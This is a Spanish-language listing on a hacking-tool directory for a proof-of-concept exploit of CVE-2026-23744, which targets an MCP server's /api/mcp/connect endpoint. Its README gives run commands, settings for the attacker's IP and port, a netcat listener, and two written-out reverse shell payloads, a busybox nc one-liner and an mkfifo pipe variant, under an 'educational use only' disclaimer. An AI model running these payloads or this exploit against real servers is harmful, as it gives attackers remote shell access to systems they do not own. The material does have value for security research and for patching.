Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/h1sok444/cve-2026-23744-poc
ExplotaciónExplotación de Aplicaciones WebComando y ControlHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubh1sok444/cve-2026-23744-poc

CVE-2026-23744-PoC

Prueba de concepto de exploit para CVE-2026-23744, dirigida a /api/mcp/connect para lograr ejecución remota de comandos en sistemas Linux mediante una shell inversa.

Ver Repositorio
55hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-23744-PoC

Exploit RCE para MCP (Linux)

PoC para explotar /api/mcp/connect para ejecución remota de comandos.


Requisitos

root@kitploit:~
pip install requests

Uso

root@kitploit:~
python3 exploit.py <objetivo>

Ejemplo:

root@kitploit:~
python3 exploit.py mcp.something.com

Configuración (editar en el script)

root@kitploit:~
attacker_ip = "YOUR_IP"
port = 4444

Listener

root@kitploit:~
nc -lvnp 4444

Payloads

Predeterminado:

root@kitploit:~
busybox nc <IP> <PORT> -e /bin/sh

Alternativa:

root@kitploit:~
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | busybox nc <IP> <PORT> > /tmp/f


Notas

  • Prueba los puertos 80/443 si no obtienes shell
  • Usa la alternativa si -e falla

Aviso legal

Solo para uso educativo.

Descargar herramienta